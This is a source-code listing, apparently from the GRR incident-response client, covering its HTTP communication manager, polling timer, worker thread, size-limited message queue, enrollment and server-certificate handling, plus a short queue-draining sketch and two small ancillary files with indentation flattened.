def _ConcatenateURL(self, base, url):
if not url.startswith("/"):
url = "/" + url
if base.endswith("/"):
base = base[:-1]
return base + url
def OpenServerEndpoint(self,
path,
verify_cb=lambda x: True,
data=None,
params=None,
headers=None,
method="GET",
timeout=None):
"""Search through all the base URLs to connect to one that works.
This is a thin wrapper around requests.request() so most parameters are
documented there.
Args:
path: The URL path to access in this endpoint.
verify_cb: A callback which should return True if the response is
reasonable. This is used to detect if we are able to talk to the correct
endpoint. If not we try a different endpoint/proxy combination.
data: Parameters to send in POST bodies (See Requests documentation).
params: Parameters to send in GET URLs (See Requests documentation).
headers: Additional headers (See Requests documentation)
method: The HTTP method to use. If not set we select one automatically.
timeout: See Requests documentation.
Returns:
an HTTPObject() instance with the correct error code set.
"""
tries = 0
last_error = HTTPObject(code=404)
while tries < len(self.base_urls):
base_url_index = self.last_base_url_index % len(self.base_urls)
active_base_url = self.base_urls[base_url_index]
result = self.OpenURL(
self._ConcatenateURL(active_base_url, path),
data=data,
params=params,
headers=headers,
method=method,
timeout=timeout,
verify_cb=verify_cb,
)
if not result.Success():
tries += 1
self.last_base_url_index += 1
last_error = result
continue
# The URL worked - we record that.
self.active_base_url = active_base_url
return result
# No connection is possible at all.
logging.info(
"Could not connect to GRR servers %s, directly or through "
"these proxies: %s.", self.base_urls, self.proxies)
return last_error
def OpenURL(self,
url,
verify_cb=lambda x: True,
data=None,
params=None,
headers=None,
method="GET",
timeout=None):
"""Get the requested URL.
Note that we do not have any concept of timing here - we try to connect
through all proxies as fast as possible until one works. Timing and poll
frequency is left to the calling code.
Args:
url: The URL to fetch
verify_cb: An optional callback which can be used to validate the URL. It
receives the HTTPObject and return True if this seems OK, False
otherwise. For example, if we are behind a captive portal we might
receive invalid object even though HTTP status is 200.
data: Parameters to send in POST bodies (See Requests documentation).
params: Parameters to send in GET URLs (See Requests documentation).
headers: Additional headers (See Requests documentation)
method: The HTTP method to use. If not set we select one automatically.
timeout: See Requests documentation.
Returns:
An HTTPObject instance or None if a connection could not be made.
"""
# Start checking the proxy from the last value found.
tries = 0
last_error = 500
while tries < len(self.proxies):
proxy_index = self.last_proxy_index % len(self.proxies)
proxy = self.proxies[proxy_index]
try:
proxydict = {}
if proxy:
proxydict["http"] = proxy
proxydict["https"] = proxy
headers = (headers or {}).copy()
headers["Cache-Control"] = "no-cache"
if data:
method = "POST"
duration, handle = self._RetryRequest(
url=url,
data=data,
params=params,
headers=headers,
method=method,
timeout=timeout,
proxies=proxydict,
)
data = handle.content
result = HTTPObject(
url=url, data=data, proxy=proxy, code=200, duration=duration)
if not verify_cb(result):
raise IOError("Data not verified.")
# The last connection worked.
self.consecutive_connection_errors = 0
return result
except requests.RequestException as e:
# Especially trap a 406 error message - it means the client needs to
# enroll.
if e.response is not None:
last_error = e.response.status_code
if last_error == 406:
# A 406 is not considered an error as the frontend is reachable. If
# we considered it as an error the client would be unable to send
# the enrollment request since connection errors disable message
# draining.
self.consecutive_connection_errors = 0
return HTTPObject(code=406)
# Try the next proxy
self.last_proxy_index = proxy_index + 1
tries += 1
# Catch any exceptions that dont have a code (e.g. socket.error).
except IOError:
# Try the next proxy
self.last_proxy_index = proxy_index + 1
tries += 1
last_error = 500
# Catch unexpected exceptions. If the error is proxy related it makes
# sense to cycle the proxy before reraising. One error we have seen here
# is ProxySchemeUnknown but urllib can raise many different exceptions, it
# doesn't make sense to enumerate them all.
except Exception: # pylint: disable=broad-except
logging.exception(
"Got an unexpected exception while connecting to the server.")
# Try the next proxy
self.last_proxy_index = proxy_index + 1
tries += 1
last_error = 500
# We failed to connect at all here.
return HTTPObject(code=last_error)
def _RetryRequest(self, timeout=None, **request_args):
"""Retry the request a few times before we determine it failed.
Sometimes the frontend becomes loaded and issues a 500 error to throttle the
clients. We wait Client.error_poll_min seconds between each attempt to back
off the frontend. Note that this does not affect any timing algorithm in the
client itself which is controlled by the Timer() class.
Args:
timeout: Timeout for retry.
**request_args: Args to the requests.request call.
Returns:
a tuple of duration, urllib.request.urlopen response.
"""
while True:
try:
now = time.time()
if not timeout:
timeout = config.CONFIG["Client.http_timeout"]
result = requests.request(**request_args)
# By default requests doesn't raise on HTTP error codes.
result.raise_for_status()
# Requests does not always raise an exception when an incorrect response
# is received. This fixes that behaviour.
if not result.ok:
raise requests.RequestException(response=result)
return time.time() - now, result
# Catch any exceptions that dont have a code (e.g. socket.error).
except IOError as e:
self.consecutive_connection_errors += 1
# Request failed. If we connected successfully before we attempt a few
# connections before we determine that it really failed. This might
# happen if the front end is loaded and returns a few throttling 500
# messages.
if self.active_base_url is not None:
# Propagate 406 immediately without retrying, as 406 is a valid
# response that indicates a need for enrollment.
response = getattr(e, "response", None)
if getattr(response, "status_code", None) == 406:
raise
if self.consecutive_connection_errors >= self.retry_error_limit:
# We tried several times but this really did not work, just fail it.
logging.info(
"Too many connection errors to %s, retrying another URL",
self.active_base_url)
self.active_base_url = None
raise e
# Back off hard to allow the front end to recover.
logging.debug(
"Unable to connect to frontend. Backing off %s seconds.",
self.error_poll_min)
self.Wait(self.error_poll_min)
# We never previously connected, maybe the URL/proxy is wrong? Just fail
# right away to allow callers to try a different URL.
else:
raise e
def Wait(self, timeout):
"""Wait for the specified timeout."""
time.sleep(timeout - int(timeout))
# Split a long sleep interval into 1 second intervals so we can heartbeat.
for _ in range(int(timeout)):
time.sleep(1)
if self.heart_beat_cb:
self.heart_beat_cb()
def ErrorLimitReached(self):
return self.consecutive_connection_errors > self.connection_error_limit
class Timer(object):
"""Implements the polling policy.
External code simply calls our Wait() method without regard to the exact
timing policy.
"""
# Slew of poll time.
poll_slew = 1.15
def __init__(self):
self.poll_min = config.CONFIG["Client.poll_min"]
self.sleep_time = self.poll_max = config.CONFIG["Client.poll_max"]
def FastPoll(self):
"""Switch to fast poll mode."""
self.sleep_time = self.poll_min
def SlowPoll(self):
"""Switch to slow poll mode."""
self.sleep_time = self.poll_max
def Wait(self):
"""Wait until the next action is needed."""
time.sleep(self.sleep_time - int(self.sleep_time))
# Split a long sleep interval into 1 second intervals so we can heartbeat.
for _ in range(int(self.sleep_time)):
time.sleep(1)
# Back off slowly at first and fast if no answer.
self.sleep_time = min(self.poll_max,
max(self.poll_min, self.sleep_time) * self.poll_slew)
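# Illustrative numbers only (not part of GRR): with poll_min around 0.2 s and
# poll_max around 600 s, successive Wait() calls after FastPoll() sleep roughly
# 0.2, 0.23, 0.26, ... seconds, each 15% (poll_slew) longer than the last,
# until the interval is capped at poll_max; SlowPoll() resets it straight back
# to poll_max.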
class GRRClientWorker(threading.Thread):
"""This client worker runs the main loop in another thread.
The client which uses this worker is not blocked while queuing messages to be
worked on. There is only a single working thread though.
The overall effect is that the HTTP client is not blocked waiting for actions
to be executed, and at the same time, the client working thread is not blocked
waiting on network latency.
"""
stats_collector = None
sent_bytes_per_flow = {}
# Client sends stats notifications at least every 50 minutes.
STATS_MAX_SEND_INTERVAL = rdfvalue.Duration("50m")
# Client sends stats notifications at most every 60 seconds.
STATS_MIN_SEND_INTERVAL = rdfvalue.Duration("60s")
def __init__(self,
client=None,
out_queue=None,
internal_nanny_monitoring=True,
heart_beat_cb=None):
threading.Thread.__init__(self)
# A reference to the parent client that owns us.
self.client = client
self._is_active = False
self.proc = psutil.Process()
self.nanny_controller = None
self.transaction_log = client_utils.TransactionLog()
if internal_nanny_monitoring:
self.StartNanny()
if heart_beat_cb is None:
heart_beat_cb = self.nanny_controller.Heartbeat
self.heart_beat_cb = heart_beat_cb
self.lock = threading.RLock()
# The worker may communicate over HTTP independently from the comms
# thread. This way we do not need to synchronize the HTTP manager between
# the two threads.
self.http_manager = HTTPManager(heart_beat_cb=heart_beat_cb)
# This queue should never hit its maximum since the server will throttle
# messages before this.
self._in_queue = utils.HeartbeatQueue(callback=heart_beat_cb, maxsize=1024)
if out_queue is not None:
self._out_queue = out_queue
else:
# The size of the output queue controls the worker thread. Once this queue
# is too large, the worker thread will block until the queue is drained.
self._out_queue = SizeLimitedQueue(
maxsize=config.CONFIG["Client.max_out_queue"],
heart_beat_cb=heart_beat_cb)
# Only start this thread after the _out_queue is ready to send.
self.StartStatsCollector()
self.daemon = True
def QueueResponse(self, message, blocking=True):
"""Pushes the Serialized Message on the output queue."""
self._out_queue.Put(message, block=blocking)
def Drain(self, max_size=1024):
"""Return a GrrQueue message list from the queue, draining it.
This is used to get the messages going _TO_ the server when the
client connects.
Args:
max_size: The size (in bytes) of the returned protobuf will be at most
one message length over this size.
Returns:
A MessageList protobuf
"""
return self._out_queue.GetMessages(soft_size_limit=max_size)
def QueueMessages(self, messages):
"""Push messages to the input queue."""
# Push all the messages to our input queue
for message in messages:
self._in_queue.put(message, block=True)
def InQueueSize(self):
"""Returns the number of protobufs ready to be sent in the queue."""
return self._in_queue.qsize()
def OutQueueSize(self):
"""Returns the total size of messages ready to be sent."""
return self._out_queue.Size()
def SyncTransactionLog(self):
self.transaction_log.Sync()
def Heartbeat(self):
if self.heart_beat_cb:
self.heart_beat_cb()
def StartNanny(self):
# Use this to control the nanny transaction log.
self.nanny_controller = client_utils.NannyController()
self.nanny_controller.StartNanny()
def StartStatsCollector(self):
if not GRRClientWorker.stats_collector:
GRRClientWorker.stats_collector = client_stats.ClientStatsCollector(self)
GRRClientWorker.stats_collector.start()
def SendReply(self,
rdf_value=None,
request_id=None,
response_id=None,
session_id="W:0",
message_type=None,
name=None,
require_fastpoll=None,
ttl=None,
blocking=True,
task_id=None):
"""Send the protobuf to the server.
Args:
rdf_value: The RDFvalue to return.
request_id: The id of the request this is a response to.
response_id: The id of this response.
session_id: The session id of the flow.
message_type: The contents of this message, MESSAGE, STATUS, ITERATOR or
RDF_VALUE.
name: The name of the client action that sends this response.
require_fastpoll: If set, this will set the client to fastpoll mode after
sending this message.
ttl: The time to live of this message.
blocking: If the output queue is full, block until there is space.
task_id: The task ID that the request was queued at. We send this back to
the server so it can de-queue the request.
Raises:
RuntimeError: An object other than an RDFValue was passed for sending.
"""
if not isinstance(rdf_value, rdfvalue.RDFValue):
raise RuntimeError("Sending objects other than RDFValues not supported.")
message = rdf_flows.GrrMessage(
session_id=session_id,
task_id=task_id,
name=name,
response_id=response_id,
request_id=request_id,
require_fastpoll=require_fastpoll,
ttl=ttl,
type=message_type)
if rdf_value is not None:
message.payload = rdf_value
serialized_message = message.SerializeToString()
self.ChargeBytesToSession(session_id, len(serialized_message))
if message.type == rdf_flows.GrrMessage.Type.STATUS:
rdf_value.network_bytes_sent = self.sent_bytes_per_flow[session_id]
del self.sent_bytes_per_flow[session_id]
message.payload = rdf_value
try:
self.QueueResponse(message, blocking=blocking)
except queue.Full:
# In the case of a non blocking send, we reraise the exception to notify
# the caller that something went wrong.
if not blocking:
raise
# There is nothing we can do about it here - we just lose the message and
# keep going.
logging.info("Queue is full, dropping messages.")
@utils.Synchronized
def ChargeBytesToSession(self, session_id, length, limit=0):
self.sent_bytes_per_flow.setdefault(session_id, 0)
self.sent_bytes_per_flow[session_id] += length
# Check after incrementing so that sent_bytes_per_flow goes over the limit
# even though we don't send those bytes. This makes sure flow_runner will
# die on the flow.
if limit and self.sent_bytes_per_flow[session_id] > limit:
self.SendClientAlert("Network limit exceeded.")
raise actions.NetworkBytesExceededError(
"Action exceeded network send limit.")
def HandleMessage(self, message):
"""Entry point for processing jobs.
Args:
message: The GrrMessage that was delivered from the server.
Raises:
RuntimeError: The client action requested was not found.
"""
self._is_active = True
try:
action_cls = actions.ActionPlugin.classes.get(message.name)
if action_cls is None:
raise RuntimeError("Client action %r not known" % message.name)
action = action_cls(grr_worker=self)
# Write the message to the transaction log.
self.transaction_log.Write(message)
# Heartbeat so we have the full period to work on this message.
action.Progress()
action.Execute(message)
# If we get here without exception, we can remove the transaction.
self.transaction_log.Clear()
finally:
self._is_active = False
# We want to send ClientStats when client action is complete.
self.stats_collector.RequestSend()
def MemoryExceeded(self):
"""Returns True if our memory footprint is too large."""
rss_size = self.proc.memory_info().rss
return rss_size // 1024 // 1024 > config.CONFIG["Client.rss_max"]
def IsActive(self):
"""Returns True if worker is currently handling a message."""
return self._is_active
def SendNannyMessage(self):
# We might be monitored by Fleetspeak.
if not self.nanny_controller:
return
msg = self.nanny_controller.GetNannyMessage()
if msg:
self.SendReply(
rdf_protodict.DataBlob(string=msg),
session_id=rdfvalue.FlowSessionID(flow_name="NannyMessage"),
require_fastpoll=False)
self.nanny_controller.ClearNannyMessage()
def SendClientAlert(self, msg):
self.SendReply(
rdf_protodict.DataBlob(string=msg),
session_id=rdfvalue.FlowSessionID(flow_name="ClientAlert"),
require_fastpoll=False)
def Sleep(self, timeout):
"""Sleeps the calling thread with heartbeat."""
if self.nanny_controller:
self.nanny_controller.Heartbeat()
# Split a long sleep interval into 1 second intervals so we can heartbeat.
while timeout > 0:
time.sleep(min(1., timeout))
timeout -= 1
# If the output queue is full, we are ready to do a post - no
# point in waiting.
if self._out_queue.Full():
return
if self.nanny_controller:
self.nanny_controller.Heartbeat()
def OnStartup(self):
"""A handler that is called on client startup."""
# We read the transaction log and fail any requests that are in it. If there
# is anything in the transaction log we assume its there because we crashed
# last time and let the server know.
last_request = self.transaction_log.Get()
if last_request:
status = rdf_flows.GrrStatus(
status=rdf_flows.GrrStatus.ReturnedStatus.CLIENT_KILLED,
error_message="Client killed during transaction")
if self.nanny_controller:
nanny_status = self.nanny_controller.GetNannyStatus()
if nanny_status:
status.nanny_status = nanny_status
self.SendReply(
status,
request_id=last_request.request_id,
response_id=1,
session_id=last_request.session_id,
message_type=rdf_flows.GrrMessage.Type.STATUS)
self.transaction_log.Clear()
# Inform the server that we started.
action = admin.SendStartupInfo(grr_worker=self)
action.Run(None, ttl=1)
def run(self):
"""Main thread for processing messages."""
self.OnStartup()
try:
while True:
message = self._in_queue.get()
# A message of None is our terminal message.
if message is None:
break
try:
self.HandleMessage(message)
# Catch any errors and keep going here
except Exception as e: # pylint: disable=broad-except
logging.warn("%s", e)
self.SendReply(
rdf_flows.GrrStatus(
status=rdf_flows.GrrStatus.ReturnedStatus.GENERIC_ERROR,
error_message=utils.SmartUnicode(e)),
request_id=message.request_id,
response_id=1,
session_id=message.session_id,
task_id=message.task_id,
message_type=rdf_flows.GrrMessage.Type.STATUS)
if flags.FLAGS.debug:
pdb.post_mortem()
except Exception as e: # pylint: disable=broad-except
logging.error("Exception outside of the processing loop: %r", e)
finally:
# There's no point in running the client if it's broken out of the
# processing loop and it should be restarted shortly anyway.
logging.fatal("The client has broken out of its processing loop.")
# The binary (Python threading library, perhaps) has proven in tests to be
# very resistant to termination calls, so we kill it with fire.
os.kill(os.getpid(), signal.SIGKILL)
class SizeLimitedQueue(object):
"""A Queue which limits the total size of its elements.
The standard Queue implementation uses the total number of elements to block
on. In the client we want to limit the total memory footprint, hence we need
to use the total size as a measure of how full the queue is.
"""
def __init__(self, heart_beat_cb, maxsize=1024):
self._queue = collections.deque()
self._lock = threading.Lock()
self._total_size = 0
self._maxsize = maxsize
self._heart_beat_cb = heart_beat_cb
def Put(self, message, block=True, timeout=1000):
"""Put a message on the queue, blocking if it is too full.
Blocks when the queue contains more than the threshold.
Args:
message: rdf_flows.GrrMessage The message to put.
block: bool If True, we block and wait for the queue to have more space.
Otherwise, if the queue is full, we raise.
timeout: int Maximum time (in seconds, with 1 sec resolution) we spend
waiting on the queue.
Raises:
queue.Full: if the queue is full and block is False, or
timeout is exceeded.
"""
# We only queue already serialized objects so we know how large they are.
message = message.SerializeToString()
if not block:
if self.Full():
raise queue.Full
else:
t0 = time.time()
while self.Full():
time.sleep(1)
self._heart_beat_cb()
if time.time() - t0 > timeout:
raise queue.Full
with self._lock:
self._queue.appendleft(message)
self._total_size += len(message)
def _Generate(self):
"""Yields messages from the queue. Lock should be held by the caller."""
while self._queue:
yield self._queue.pop()
def GetMessages(self, soft_size_limit=None):
"""Retrieves and removes the messages from the queue.
Args:
soft_size_limit: int If there is more data in the queue than
soft_size_limit bytes, the returned list of messages will be
approximately this large. If None (default), returns all messages
currently on the queue.
Returns:
rdf_flows.MessageList A list of messages that were .Put on the queue
earlier.
"""
with self._lock:
ret = rdf_flows.MessageList()
ret_size = 0
for message in self._Generate():
self._total_size -= len(message)
ret.job.append(rdf_flows.GrrMessage.FromSerializedString(message))
ret_size += len(message)
if soft_size_limit is not None and ret_size > soft_size_limit:
break
return ret
def Size(self):
return self._total_size
def Full(self):
return self._total_size >= self._maxsize
class GRRHTTPClient(object):
"""A class which abstracts away HTTP communications.
To create a new GRR HTTP client, instantiate this class and call
its Run() method.
The HTTP client starts up by loading a communicator which will read the
client's public key (or create a new random key). Since the client ID is based
on the key (it's a hash of the public key), the communicator controls the
client name.
The client worker is then created - this will be the main thread for executing
server messages.
The client then creates a HTTPManager() instance to control communication with
the front end over HTTP, and a Timer() instance to control polling policy.
The HTTP client simply reads pending messages from the client worker queues
and makes POST requests to the server. The POST request may return the
following error conditions:
- A successful POST is signified by a status of 200: The client worker is
given any requests the server has sent.
- A status code of 406 means that the server is unable to communicate with
the client. The client will then prepare an enrollment request CSR and
send that. Enrollment requests are throttled to a
maximum of one every 10 minutes.
- A status code of 500 is an error, the messages are re-queued and the
client waits and retries to send them later.
"""
http_manager_class = HTTPManager
def __init__(self, ca_cert=None, worker_cls=None, private_key=None):
"""Constructor.
Args:
ca_cert: String representation of a CA certificate to use for checking
server certificate.
worker_cls: The client worker class to use. Defaults to GRRClientWorker.
private_key: The private key for this client. Defaults to config
Client.private_key.
"""
self.ca_cert = ca_cert
if private_key is None:
private_key = config.CONFIG.Get("Client.private_key", default=None)
# The server's PEM encoded certificate.
self.server_certificate = None
# This manages our HTTP connections. Note: The comms thread is allowed to
# block indefinitely since the worker thread is responsible for
# heart-beating the nanny. We assume that HTTP requests can not block
# indefinitely.
self.http_manager = self.http_manager_class()
# The communicator manages our crypto with the server.
self.communicator = ClientCommunicator(private_key=private_key)
# This controls our polling frequency.
self.timer = Timer()
# The time we last sent an enrollment request. Enrollment requests are
# throttled to a maximum of one every 10 minutes.
self.last_enrollment_time = 0
# The time we last checked with the foreman.
self.last_foreman_check = 0
# The client worker does all the real work here.
if worker_cls:
self.client_worker = worker_cls(client=self)
else:
self.client_worker = GRRClientWorker(client=self)
# TODO(hanuszczak): Maybe we should start the thread in `GRRHTTPClient::Run`
# method instead? Starting threads in constructor is rarely a good idea, is
# it guaranteed that we call `GRRHTTPClient::Run` only once?
self.client_worker.start()
def FleetspeakEnabled(self):
return False
def VerifyServerPEM(self, http_object):
"""Check the server PEM for validity.
This is used to determine connectivity to the server. Sometimes captive
portals return a valid HTTP status, but the data is corrupted.
Args:
http_object: The response received from the server.
Returns:
True if the response contains a valid server certificate.
"""
try:
server_pem = http_object.data
server_url = http_object.url
if "BEGIN CERTIFICATE" in server_pem:
# Now we know that this proxy is working. We still have to verify the
# certificate. This will raise if the server cert is invalid.
server_certificate = rdf_crypto.RDFX509Cert(server_pem)
self.communicator.LoadServerCertificate(
server_certificate=server_certificate, ca_certificate=self.ca_cert)
logging.info("Server PEM re-keyed.")
return True
except Exception as e: # pylint: disable=broad-except
logging.info("Unable to verify server certificate at %s: %s", server_url,
e)
return False
def VerifyServerControlResponse(self, http_object):
"""Verify the server response to a 'control' endpoint POST message.
We consider the message correct if and only if we can decrypt it
properly. Note that in practice we cannot use the HTTP status to figure out
if the request worked because captive proxies have a habit of lying and
returning an HTTP success code even when there is no connectivity.
Args:
http_object: The HTTPObject returned from the HTTP transaction.
Returns:
True if the http_object is correct. False if it is not valid.
Side Effect:
Fill in the decoded_data attribute in the http_object.
"""
if http_object.code != 200:
return False
# Try to decrypt the message into the http_object.
try:
http_object.messages, http_object.source, http_object.nonce = (
self.communicator.DecryptMessage(http_object.data))
return True
# Something went wrong - the response seems invalid!
except communicator.DecodingError as e:
logging.info("Protobuf decode error: %s.", e)
return False
def MakeRequest(self, data):
"""Make a HTTP Post request to the server 'control' endpoint."""
stats_collector_instance.Get().IncrementCounter("grr_client_sent_bytes",
len(data))
# Verify the response is as it should be from the control endpoint.
response = self.http_manager.OpenServerEndpoint(
path="control?api=%s" % config.CONFIG["Network.api"],
verify_cb=self.VerifyServerControlResponse,
data=data,
headers={"Content-Type": "binary/octet-stream"})
if response.code == 406:
self.InitiateEnrolment()
return response
if response.code == 200:
stats_collector_instance.Get().IncrementCounter(
"grr_client_received_bytes", len(response.data))
return response
# An unspecified error occurred.
return response
def RunOnce(self):
"""Makes a single request to the GRR server.
Returns:
A Status() object indicating how the last POST went.
"""
# Attempt to fetch and load server certificate.
if not self._FetchServerCertificate():
self.timer.Wait()
return HTTPObject(code=500)
# Here we only drain messages if we were able to connect to the server in
# the last poll request. Otherwise we just wait until the connection comes
# back so we don't expire our messages too fast.
if self.http_manager.consecutive_connection_errors == 0:
# Grab some messages to send
message_list = self.client_worker.Drain(
max_size=config.CONFIG["Client.max_post_size"])
else:
message_list = rdf_flows.MessageList()
# If any outbound messages require fast poll we switch to fast poll mode.
for message in message_list.job:
if message.require_fastpoll:
self.timer.FastPoll()
break
# Make new encrypted ClientCommunication rdfvalue.
payload = rdf_flows.ClientCommunication()
# If our memory footprint is too large, we advertise that our input queue
# is full. This will prevent the server from sending us any messages, and
# hopefully allow us to work down our memory usage, by processing any
# outstanding messages.
if self.client_worker.MemoryExceeded():
logging.info("Memory exceeded, will not retrieve jobs.")
payload.queue_size = 1000000
else:
# Let the server know how many messages are currently queued in
# the input queue.
payload.queue_size = self.client_worker.InQueueSize()
nonce = self.communicator.EncodeMessages(message_list, payload)
payload_data = payload.SerializeToString()
response = self.MakeRequest(payload_data)
# Unable to decode response or response not valid.
if response.code != 200 or response.messages is None:
# We don't print response here since it should be encrypted and will
# cause ascii conversion errors.
logging.info("%s: Could not connect to server at %s, status %s",
self.communicator.common_name,
self.http_manager.active_base_url, response.code)
# Force the server pem to be reparsed on the next connection.
self.server_certificate = None
# Reschedule the tasks back on the queue so they get retried next time.
messages = list(message_list.job)
for message in messages:
message.require_fastpoll = False
message.ttl -= 1
if message.ttl > 0:
self.client_worker.QueueResponse(message)
else:
logging.info("Dropped message due to retransmissions.")
return response
# Check the decoded nonce was as expected.
if response.nonce != nonce:
logging.info("Nonce not matched.")
response.code = 500
return response
if response.source != self.communicator.server_name:
logging.info("Received a message not from the server "
"%s, expected %s.", response.source,
self.communicator.server_name)
response.code = 500
return response
# Check to see if any inbound messages want us to fastpoll. This means we
# drop to fastpoll immediately on a new request rather than waiting for the
# next beacon to report results.
for message in response.messages:
if message.require_fastpoll:
self.timer.FastPoll()
break
# Process all messages. Messages can be processed by clients in
# any order since clients do not have state.
self.client_worker.QueueMessages(response.messages)
cn = self.communicator.common_name
logging.info(
"%s: Sending %s(%s), Received %s messages in %s sec. "
"Sleeping for %s sec.", cn, len(message_list), len(payload_data),
len(response.messages), response.duration, self.timer.sleep_time)
return response
def SendForemanRequest(self):
self.client_worker.SendReply(
rdf_protodict.DataBlob(),
session_id=rdfvalue.FlowSessionID(flow_name="Foreman"),
require_fastpoll=False)
def _FetchServerCertificate(self):
"""Attempts to fetch the server cert.
Returns:
True if we succeed.
"""
# Certificate is loaded and still valid.
if self.server_certificate:
return True
response = self.http_manager.OpenServerEndpoint(
"server.pem", verify_cb=self.VerifyServerPEM)
if response.Success():
self.server_certificate = response.data
return True
# We failed to fetch the cert, switch to slow poll mode.
self.timer.SlowPoll()
return False
def Run(self):
"""The main run method of the client.
This method does not normally return. It returns only if there have been
more than connection_error_limit failures, in which case the client is
allowed to exit.
"""
while True:
if self.http_manager.ErrorLimitReached():
return
# Check if there is a message from the nanny to be sent.
self.client_worker.SendNannyMessage()
now = time.time()
# Check with the foreman if we need to
if (now > self.last_foreman_check +
config.CONFIG["Client.foreman_check_frequency"]):
# We must not queue messages from the comms thread with blocking=True
# or we might deadlock. If the output queue is full, we can't accept
# more work from the foreman anyways so it's ok to drop the message.
try:
self.client_worker.SendReply(
rdf_protodict.DataBlob(),
session_id=rdfvalue.FlowSessionID(flow_name="Foreman"),
require_fastpoll=False,
blocking=False)
self.last_foreman_check = now
except queue.Full:
pass
try:
self.RunOnce()
except Exception: # pylint: disable=broad-except
# Catch everything, yes, this is terrible but necessary
logging.warn("Uncaught exception caught: %s", traceback.format_exc())
if flags.FLAGS.debug:
pdb.post_mortem()
# We suicide if our memory is exceeded, and there is no more work to do
# right now. Our death should not result in loss of messages since we are
# not holding any requests in our input queues.
if (self.client_worker.MemoryExceeded() and
not self.client_worker.IsActive() and
self.client_worker.InQueueSize() == 0 and
self.client_worker.OutQueueSize() == 0):
logging.warning("Memory exceeded - exiting.")
self.client_worker.SendClientAlert("Memory limit exceeded, exiting.")
# Make sure this will return True so we don't get more work.
# pylint: disable=g-bad-name
self.client_worker.MemoryExceeded = lambda: True
# pylint: enable=g-bad-name
# Now send back the client message.
self.RunOnce()
# And done for now.
sys.exit(-1)
self.timer.Wait()
def InitiateEnrolment(self):
"""Initiate the enrollment process.
We do not send more than one enrollment request every 10 minutes. Note that
we still communicate with the server in fast poll mode, but these requests
do not carry any payload.
"""
logging.debug("sending enrollment request")
now = time.time()
if now > self.last_enrollment_time + 10 * 60:
if not self.last_enrollment_time:
# This is the first enrollment request - we should enter fastpoll mode.
self.timer.FastPoll()
self.last_enrollment_time = now
# Send registration request:
self.client_worker.SendReply(
rdf_crypto.Certificate(
type=rdf_crypto.Certificate.Type.CSR,
pem=self.communicator.GetCSRAsPem()),
session_id=rdfvalue.SessionID(
queue=queues.ENROLLMENT, flow_name="Enrol"))
class ClientCommunicator(communicator.Communicator):
"""A communicator implementation for clients.
This extends the generic communicator to include verification of
server side certificates.
"""
def __init__(self, certificate=None, private_key=None):
super(ClientCommunicator, self).__init__(
certificate=certificate, private_key=private_key)
self.InitPrivateKey()
def InitPrivateKey(self):
"""Makes sure this client has a private key set.
It first tries to load an RSA key from the certificate.
If no certificate is found, or it is invalid, we make a new random RSA key,
and store it as our certificate.
Returns:
An RSA key - either from the certificate or a new random key.
"""
if self.private_key:
try:
self.common_name = rdf_client.ClientURN.FromPrivateKey(self.private_key)
logging.info("Starting client %s", self.common_name)
return self.private_key
except type_info.TypeValueError:
pass
# We either have an invalid key or no key. We just generate a new one.
key = rdf_crypto.RSAPrivateKey.GenerateKey(
bits=config.CONFIG["Client.rsa_key_length"])
self.common_name = rdf_client.ClientURN.FromPrivateKey(key)
logging.info("Client pending enrolment %s", self.common_name)
# Save the keys
self.SavePrivateKey(key)
return key
def GetCSR(self):
"""Return our CSR."""
return rdf_crypto.CertificateSigningRequest(
common_name=self.common_name, private_key=self.private_key)
def GetCSRAsPem(self):
"""Return our CSR in PEM format."""
return self.GetCSR().AsPEM()
def SavePrivateKey(self, private_key):
"""Store the new private key on disk."""
self.private_key = private_key
config.CONFIG.Set("Client.private_key",
self.private_key.SerializeToString())
config.CONFIG.Write()
def LoadServerCertificate(self, server_certificate=None, ca_certificate=None):
"""Loads and verifies the server certificate."""
# Check that the server certificate verifies
try:
server_certificate.Verify(ca_certificate.GetPublicKey())
except rdf_crypto.VerificationError as e:
self.server_name = None
raise IOError("Server cert is invalid: %s" % e)
# Make sure that the serial number is higher.
server_cert_serial = server_certificate.GetSerialNumber()
if server_cert_serial < config.CONFIG["Client.server_serial_number"]:
# We can not accept this serial number...
raise IOError("Server certificate serial number is too old.")
elif server_cert_serial > config.CONFIG["Client.server_serial_number"]:
logging.info("Server serial number updated to %s", server_cert_serial)
config.CONFIG.Set("Client.server_serial_number", server_cert_serial)
# Save the new data to the config file.
config.CONFIG.Write()
self.server_name = server_certificate.GetCN()
self.server_certificate = server_certificate
self.ca_certificate = ca_certificate
self.server_public_key = server_certificate.GetPublicKey()
# If we still have a cached session key, we need to remove it.
self._ClearServerCipherCache()
def EncodeMessages(self, message_list, result, **kwargs):
# Force the right API to be used
kwargs["api_version"] = config.CONFIG["Network.api"]
return super(ClientCommunicator, self).EncodeMessages(
message_list, result, **kwargs)
def _GetRemotePublicKey(self, common_name):
if common_name == self.server_name:
return self.server_public_key
raise communicator.UnknownClientCertError(
"Client wants to talk to %s, not %s" % (common_name, self.server_name))
```
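The `SizeLimitedQueue` above blocks and batches on total serialized byte size rather than element count. The following standalone sketch illustrates that batching idea with plain byte strings; the helper name and the bare `deque` are assumptions made for illustration and are not GRR APIs:
```python
import collections


def drain_by_size(queue, soft_size_limit):
    """Pops serialized messages until the batch exceeds soft_size_limit bytes."""
    batch, batch_size = [], 0
    while queue:
        msg = queue.pop()  # Oldest element; producers append to the left.
        batch.append(msg)
        batch_size += len(msg)
        if batch_size > soft_size_limit:
            break
    return batch


q = collections.deque()
for payload in (b"a" * 300, b"b" * 300, b"c" * 300):
    q.appendleft(payload)  # Mirrors SizeLimitedQueue.Put ordering.

print([len(m) for m in drain_by_size(q, soft_size_limit=500)])  # [300, 300]
print(len(q))  # 1 message left over for the next batch
```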
#### File: client/grr_response_client/distro_entry.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from grr_response_core.lib import flags
# pylint: disable=g-import-not-at-top
def ClientBuild():
from grr_response_client import client_build
client_build.Run()
def Client():
from grr_response_client import client
flags.StartMain(client.main)
def FleetspeakClient():
from grr_response_client import grr_fs_client
flags.StartMain(grr_fs_client.main)
def PoolClient():
from grr_response_client import poolclient
flags.StartMain(poolclient.main)
```
#### File: lib/parsers/parsers_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from absl.testing import absltest
from future.builtins import map
import mock
from grr_response_core.lib import factory
from grr_response_core.lib import flags
from grr_response_core.lib import parser
from grr_response_core.lib import parsers
from grr.test_lib import test_lib
class ArtifactParserFactoryTest(absltest.TestCase):
@mock.patch.object(parsers, "SINGLE_RESPONSE_PARSER_FACTORY",
factory.Factory(parser.SingleResponseParser))
